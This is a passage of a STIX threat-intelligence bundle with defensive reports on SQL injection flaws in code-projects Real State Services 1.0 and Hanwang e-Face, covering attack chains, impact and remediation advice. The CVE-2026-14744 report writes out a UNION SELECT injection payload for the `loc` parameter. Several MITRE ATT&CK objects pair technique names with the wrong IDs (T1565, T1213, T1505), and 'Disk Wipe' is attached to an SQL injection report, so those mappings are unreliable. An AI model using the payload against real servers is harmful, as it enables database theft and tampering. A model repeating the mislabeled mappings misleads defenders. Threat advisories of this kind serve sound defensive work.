      "description": "## Overview\n\nA high-severity SQL injection vulnerability, identified as CVE-2026-14746, has been discovered in version 1.0 of the code-projects Real State Services application. This flaw specifically affects the `/addprojectrent.php` endpoint, where an attacker can manipulate the `amen` argument to inject and execute arbitrary SQL commands. The vulnerability is remotely exploitable and does not require authentication, making it a critical threat. Public disclosure of the exploit increases the likelihood of active exploitation in the wild. This vulnerability could lead to unauthorized access to sensitive data, modification of database contents, or potentially complete compromise of the affected web application's data. Organizations running this specific application version are strongly advised to take immediate remediation steps.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies an internet-facing instance of code-projects Real State Services 1.0.\n2.  The attacker crafts a malicious HTTP POST request targeting the `/addprojectrent.php` endpoint.\n3.  Within the POST request, the attacker injects SQL payloads into the `amen` argument.\n4.  The vulnerable application processes the `amen` argument without adequate input validation or sanitization.\n5.  The malicious SQL payload is then executed directly within the application's backend database.\n6.  This successful injection allows the attacker to read, modify, or delete sensitive data within the database.\n7.  The attacker may also be able to gain unauthorized administrative access or exfiltrate confidential information, leading to data breaches.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14746 can lead to severe consequences for organizations utilizing code-projects Real State Services 1.0. Attackers can gain full control over the application's database, allowing them to steal sensitive user data, property listings, or financial information. They could also manipulate or deface the website, insert malicious content, or compromise the integrity of the real estate listings. Given that the exploit has been publicly disclosed, organizations running this application are at an elevated risk of immediate data breaches, reputational damage, and operational disruption.\n\n## Recommendation\n\n*   Immediately apply any available patches or updates provided by code-projects for Real State Services 1.0 to address CVE-2026-14746.\n*   Implement robust input validation and sanitization for all user-supplied data, specifically focusing on the `amen` argument in `/addprojectrent.php`, to prevent SQL injection attacks.\n*   Deploy a Web Application Firewall (WAF) to detect and block malicious HTTP requests containing SQL injection payloads, protecting against CVE-2026-14746.\n*   Deploy the Sigma rule \"Detects CVE-2026-14746 Exploitation — SQL Injection in Real State Services\" to your SIEM and tune for your environment to identify attempted exploitation.\n",
      "published": "2026-07-05T12:21:44Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "webserver",
        "public-exploit"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14746"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/6Justdododo6/CVE/issues/25"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14746"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/849284"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376332"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376332/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--490141e4-6d04-5c2e-85af-3a58f1ed1cca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8401e689-15c9-5755-b507-9e42c7f9c037",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4a3db34f-04f1-536c-8afc-3538c1381e61",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8401e689-15c9-5755-b507-9e42c7f9c037",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--40e12d34-9621-5f52-8b93-4f9866aeb95f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8401e689-15c9-5755-b507-9e42c7f9c037",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8401e689-15c9-5755-b507-9e42c7f9c037",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14745: SQL Injection in code-projects Real State Services",
      "description": "## Overview\n\nA severe SQL injection vulnerability, identified as CVE-2026-14745, has been discovered in version 1.0 of the code-projects Real State Services application. The flaw resides within an unknown function associated with the `/single-list_rent.php` file, where improper sanitization of the `ID` argument allows unauthenticated attackers to inject and execute arbitrary SQL commands. This remote exploit poses a significant risk as it can be initiated without prior authentication, and a proof-of-concept exploit has been publicly disclosed, increasing the likelihood of widespread exploitation. Defenders should prioritize patching and implementing robust input validation to prevent attackers from compromising sensitive database information, modifying records, or potentially achieving remote code execution on the underlying server.\n\n## Attack Chain\n\n1.  Attacker discovers or targets a web server running code-projects Real State Services 1.0, potentially using publicly available exploit information for CVE-2026-14745.\n2.  The attacker crafts a malicious HTTP GET request targeting the vulnerable `/single-list_rent.php` endpoint.\n3.  A carefully constructed SQL injection payload is embedded within the `ID` URL parameter (e.g., `/single-list_rent.php?ID=\u003cSQL_PAYLOAD\u003e`).\n4.  The vulnerable application component processes the `ID` parameter without adequate input validation or sanitization, leading to the concatenation and execution of the attacker's SQL query by the backend database.\n5.  Depending on the injected payload, the database executes commands such as extracting sensitive data (e.g., user credentials, property listings, application configuration) or modifying existing records.\n6.  The application's HTTP response, designed to display rental property details, inadvertently includes the results of the executed SQL query, allowing the attacker to exfiltrate the targeted data.\n7.  The attacker achieves unauthorized access to confidential information, can manipulate application data, or potentially escalate privileges to achieve remote code execution on the underlying server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14745 allows remote, unauthenticated attackers to gain unauthorized access to the application's underlying database. This can lead to the full compromise of sensitive data, including but not limited to user credentials, personal identifiable information of clients, property listings, and administrative records, directly affecting confidentiality. Attackers could also modify database contents, leading to data integrity issues such as altering property details or transaction records. In some cases, SQL injection vulnerabilities can be leveraged for remote code execution on the server, allowing for full system compromise. The availability of a public exploit significantly increases the risk of widespread attacks against organizations using this Real Estate Services application.\n\n## Recommendation\n\n*   Immediately patch code-projects Real State Services 1.0 to a secure version if available, or remove the application from public access.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious web requests to `/single-list_rent.php`.\n*   Implement a Web Application Firewall (WAF) to block known SQL injection patterns and monitor for attempts to exploit CVE-2026-14745, specifically traffic targeting `/single-list_rent.php` with suspicious `ID` parameters.\n*   Review web server access logs for `cs-uri-stem` containing `/single-list_rent.php` and `cs-uri-query` containing SQL injection indicators (e.g., quotes, comments, boolean operators) to identify past or ongoing exploitation attempts.\n",
      "published": "2026-07-05T12:20:55Z",
      "labels": [
        "web-vulnerability",
        "sql-injection",
        "cve",
        "real-estate",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14745"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/6Justdododo6/CVE/issues/24"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14745"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/849265"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376331"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376331/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--70e22179-804e-5cbc-9974-ba5dcae1e421",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T12:19:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4026c951-88d2-5e59-a966-9a28333adc28",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "indicator--70e22179-804e-5cbc-9974-ba5dcae1e421"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--276dbb2c-b6c3-5225-b3ca-b3577ec0429b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/6Justdododo6/CVE/issues/23",
      "pattern": "[url:value = 'https://github.com/6Justdododo6/CVE/issues/23']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T12:19:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b67a06a9-7f1c-5acb-af40-d7ef7eb6eeab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "indicator--276dbb2c-b6c3-5225-b3ca-b3577ec0429b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6917c643-76f1-5100-b4c8-b5890bd071d0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14744",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14744']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T12:19:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d0f529e-95b0-583e-8a9c-3a14d3ae3e9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "indicator--6917c643-76f1-5100-b4c8-b5890bd071d0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--791fe3a0-0443-59b9-b7ed-f02d9a07def4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/849260",
      "pattern": "[url:value = 'https://vuldb.com/submit/849260']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T12:19:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81be17e5-8087-57ef-8f9e-7bdbd5b44470",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "indicator--791fe3a0-0443-59b9-b7ed-f02d9a07def4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--22a4e563-fc15-5664-9825-b353c97d745b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376330",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376330']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T12:19:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4d5396a3-ef30-5dd8-9927-5512b034011b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "indicator--22a4e563-fc15-5664-9825-b353c97d745b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--14ddab68-a526-51b1-85a1-ed2cfa681319",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376330/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376330/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T12:19:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f7ac8f32-4d7b-549a-a0b1-f0610e75ffc1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "indicator--14ddab68-a526-51b1-85a1-ed2cfa681319"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aff810a6-8f90-54dd-ad50-32964e597575",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Exploitation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1efa0bcc-9d2b-55d1-a5f3-2ebcc76a07ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--68e45248-84f4-5075-80a4-de283334d3fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a3dd1262-5b2f-5b43-948d-07564f550861",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--62fea106-e64b-5bd3-a1b5-ed3f697c7d00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14744: Remote SQL Injection in code-projects Real State Services 1.0",
      "description": "## Overview\n\nA critical SQL injection vulnerability, identified as CVE-2026-14744, has been discovered in `code-projects Real State Services` version 1.0. This flaw, published on July 5, 2026, resides within an unspecified function of the `/normalHomeRent.php` file. An unauthenticated, remote attacker can exploit this vulnerability by manipulating the `loc` argument in an HTTP GET request, bypassing security controls and enabling direct interaction with the backend database. The public release of an exploit significantly escalates the risk, making this an immediate and high-priority concern for organizations utilizing this software. Successful exploitation can lead to unauthorized access to sensitive data, data manipulation, or, in severe cases, remote code execution on the underlying server, severely impacting data confidentiality, integrity, and system availability.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies an internet-facing instance of `code-projects Real State Services 1.0`.\n2. The attacker crafts a malicious HTTP GET request targeting the vulnerable `/normalHomeRent.php` endpoint.\n3. The request includes a specifically engineered SQL injection payload embedded within the `loc` URL parameter (e.g., `loc=' UNION SELECT NULL,version(),NULL,NULL-- -`).\n4. The vulnerable `Real State Services` application processes this request without adequate input sanitization or validation for the `loc` parameter.\n5. The web application's backend code embeds the malicious payload directly into an SQL query that is sent to the database.\n6. The backend database executes the manipulated SQL query, which may result in sensitive data being returned in the HTTP response, or the execution of arbitrary database commands.\n7. The attacker retrieves the database's response, potentially gaining access to confidential information, modifying database records, or facilitating further system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14744 grants remote, unauthenticated attackers the ability to perform SQL injection, leading to significant compromises. The primary impact includes unauthorized access to sensitive database information, such as user credentials, personal data, or proprietary business information. Attackers could also manipulate or delete data, severely affecting data integrity. In some scenarios, depending on the database configuration and type of SQL injection, remote code execution might be achievable on the server hosting the application, leading to full system compromise. With a public exploit available, the number of potential victims is high, spanning any organization or individual using the affected `code-projects Real State Services 1.0` software.\n\n## Recommendation\n\n*   Immediately apply patches or security updates for `code-projects Real State Services 1.0` as they become available from the vendor, `code-projects`.\n*   Deploy the Sigma rule provided in this brief to your SIEM/detection platform to identify attempts to exploit CVE-2026-14744.\n*   Ensure web application firewalls (WAFs) are configured to detect and block common SQL injection patterns, specifically targeting the `loc` parameter in `/normalHomeRent.php`.\n*   Implement strong input validation and parameterized queries in any custom web applications to prevent similar SQL injection vulnerabilities.\n*   Review web server access logs for any suspicious requests targeting `/normalHomeRent.php` with unusual `loc` parameter values, especially those matching the IOCs or patterns in the Sigma rule.\n",
      "published": "2026-07-05T12:19:55Z",
      "labels": [
        "web-exploitation",
        "sql-injection",
        "cve-2026-14744",
        "initial-access",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--70e22179-804e-5cbc-9974-ba5dcae1e421",
        "indicator--276dbb2c-b6c3-5225-b3ca-b3577ec0429b",
        "indicator--6917c643-76f1-5100-b4c8-b5890bd071d0",
        "indicator--791fe3a0-0443-59b9-b7ed-f02d9a07def4",
        "indicator--22a4e563-fc15-5664-9825-b353c97d745b",
        "indicator--14ddab68-a526-51b1-85a1-ed2cfa681319",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14744"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/6Justdododo6/CVE/issues/23"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14744"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/849260"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376330"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376330/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b5105ba-dc74-5f0d-8b49-67a2dcf7953c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--380f0870-283e-5612-b232-0eced075effe",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Disk Wipe",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1561",
          "url": "https://attack.mitre.org/techniques/T1561"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed264fce-478c-5635-bfdd-27a7fb9e0217",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--380f0870-283e-5612-b232-0eced075effe",
      "target_ref": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--380f0870-283e-5612-b232-0eced075effe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14743: Remote SQL Injection in code-projects Real State Services 1.0",
      "description": "## Overview\n\nA high-severity SQL injection vulnerability, tracked as CVE-2026-14743, has been identified in `code-projects Real State Services version 1.0`. The flaw specifically resides in an unknown function within the `/normalHomeSale.php` file. Attackers can exploit this vulnerability remotely and without authentication by manipulating the 'loc' argument, embedding malicious SQL queries directly into database commands. This can lead to unauthorized access, modification, or deletion of sensitive database information. The existence of a publicly available exploit significantly increases the risk of this vulnerability being actively abused by malicious actors, making immediate patching or mitigation crucial for any organization using the affected software.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies an internet-facing instance of `code-projects Real State Services 1.0`.\n2.  **Initial Access**: The attacker sends a crafted HTTP GET or POST request to the vulnerable `/normalHomeSale.php` endpoint.\n3.  **Vulnerability Exploitation**: The attacker includes a specially malformed SQL injection payload within the `loc` parameter of the HTTP request.\n4.  **Server-Side Processing**: The vulnerable application processes the request, embedding the attacker-controlled `loc` parameter directly into an SQL query without proper sanitization.\n5.  **SQL Injection**: The database server executes the manipulated SQL query, granting the attacker unauthorized database access.\n6.  **Data Compromise**: The attacker can then exfiltrate sensitive data (e.g., user credentials, financial information), modify existing records, or inject new data into the database.\n7.  **Impact**: This leads to a compromise of data confidentiality, integrity, and potentially availability, depending on the attacker's objective.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14743 could lead to severe consequences for organizations running `code-projects Real State Services 1.0`. Attackers can gain complete control over the application's database, allowing for the exfiltration of sensitive user data, modification of application content, or even complete data destruction. The impact extends to potential financial losses due to data breaches, reputational damage, and service disruption. While specific victim counts are not available, any organization utilizing this vulnerable software is at risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-14743**: Immediately apply any available patches or updates for `code-projects Real State Services 1.0` as advised by the vendor. If no patch is available, remove or decommission the affected service.\n*   **Web Application Firewall (WAF)**: Implement or update WAF rules to detect and block common SQL injection patterns, especially targeting the `/normalHomeSale.php` endpoint and `loc` parameter, which can help prevent exploitation of CVE-2026-14743.\n*   **Deploy Detection Rule**: Deploy the provided Sigma rule \"Detect CVE-2026-14743 Exploitation - SQL Injection in Real State Services\" to your SIEM/detection platform.\n*   **Enable Webserver Logging**: Ensure comprehensive web server logging for HTTP requests, including `cs-uri-stem` and `cs-uri-query` parameters, to enable detection of exploitation attempts.\n",
      "published": "2026-07-05T12:18:59Z",
      "labels": [
        "sql-injection",
        "webserver",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14743"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/6Justdododo6/CVE/issues/22"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14743"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/849252"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376329"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376329/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--92b4ccf6-57b9-5f28-9cba-43773a4bff6c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2a34f15c-461e-5749-8d6b-0ca26445a08b",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2a34f15c-461e-5749-8d6b-0ca26445a08b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14737: Hanwang e-Face General Management Platform SQL Injection",
      "description": "## Overview\n\nA critical SQL injection vulnerability, tracked as CVE-2026-14737, has been identified in Hanwang e-Face General Management Platform version 6.3.5.4. This flaw resides in an unknown function within the `/sysAuthStr/querySysAuthStr.do` file, where improper handling of argument order allows for remote SQL injection. The vulnerability enables unauthenticated attackers to execute arbitrary SQL queries against the underlying database, potentially leading to information disclosure, data manipulation, or denial of service. The CVSS v3.1 base score is 7.3 (High). Crucially, an exploit for this vulnerability is publicly available, significantly increasing the risk of widespread exploitation by malicious actors. Organizations utilizing the affected Hanwang e-Face General Management Platform are urged to address this vulnerability immediately to prevent compromise.\n\n## Attack Chain\n\n1.  An unauthenticated attacker crafts a malicious HTTP request targeting the vulnerable `/sysAuthStr/querySysAuthStr.do` endpoint on a Hanwang e-Face General Management Platform 6.3.5.4 instance.\n2.  The attacker manipulates the order of arguments or introduces specific SQL metacharacters within the HTTP request parameters, leveraging the flaw in the application's input validation logic.\n3.  The application processes the malformed request, mistakenly interpreting the attacker-controlled input as legitimate SQL commands.\n4.  The embedded SQL injection payload executes within the application's database context, bypassing intended security controls.\n5.  Depending on the attacker's objective and database permissions, this can lead to unauthorized data exfiltration (e.g., user credentials, sensitive business data) or manipulation (e.g., altering records, creating new administrative accounts).\n6.  The attacker leverages the retrieved or modified data for further compromise, such as gaining higher privileges within the application or pivoting to other systems within the network.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14737 could lead to severe consequences for affected organizations. Attackers could gain unauthorized access to sensitive data stored in the Hanwang e-Face General Management Platform's database, including personal information, access credentials, or operational data. This data could be exfiltrated, modified, or deleted, leading to data breaches, reputational damage, regulatory fines, and operational disruption. The public availability of an exploit significantly increases the likelihood of opportunistic attacks, potentially affecting any organization using the vulnerable version of the platform.\n\n## Recommendation\n\n*   Immediately patch Hanwang e-Face General Management Platform to a version that remediates CVE-2026-14737 as soon as one becomes available.\n*   Deploy the Sigma rule \"Detect CVE-2026-14737 Exploitation - Hanwang e-Face SQL Injection\" to your SIEM to identify attempts to exploit `/sysAuthStr/querySysAuthStr.do`.\n*   Implement Web Application Firewall (WAF) rules to detect and block common SQL injection patterns and suspicious requests targeting the `/sysAuthStr/querySysAuthStr.do` path.\n*   Enable comprehensive webserver access logging to capture full HTTP request details (headers, methods, URIs, query strings, body) for forensics and analysis.\n",
      "published": "2026-07-05T11:21:39Z",
      "labels": [
        "sql-injection",
        "web-exploitation",
        "vulnerability",
        "cve",
